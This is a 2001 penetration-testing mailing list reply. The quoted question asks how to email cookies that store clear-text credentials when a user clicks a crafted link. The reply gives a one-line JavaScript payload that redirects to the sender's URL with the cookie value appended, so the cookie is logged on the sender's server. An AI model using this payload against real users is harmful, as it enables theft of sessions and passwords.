Penetration Testing mailing list archives

Re: Wanted: Script to email cookies

From: "rudi carell" <rudicarell () hotmail com>
Date: Mon, 03 Dec 2001 09:19:40

Joe,

I'm working on a pen test for a web application.  After
the first time you successfully authenticate, the app
stores a cookie with username and password in clear
text.  I've recently read the archive regarding
vulnerable IE browsers revealing cookies.  I'd like to
go a step farther.  Does anyone have a script that will
email the cookie?  I'd like to craft an email with a link
and when a user clicks, it emails the cookie.

.. not really necessary .. javascript:location.href=yoururl?[found cookie value]
.. creates log-file entry with cookie value on (hopefully)your server ...

rC

security () freefly com
http://www.freefly.com/security/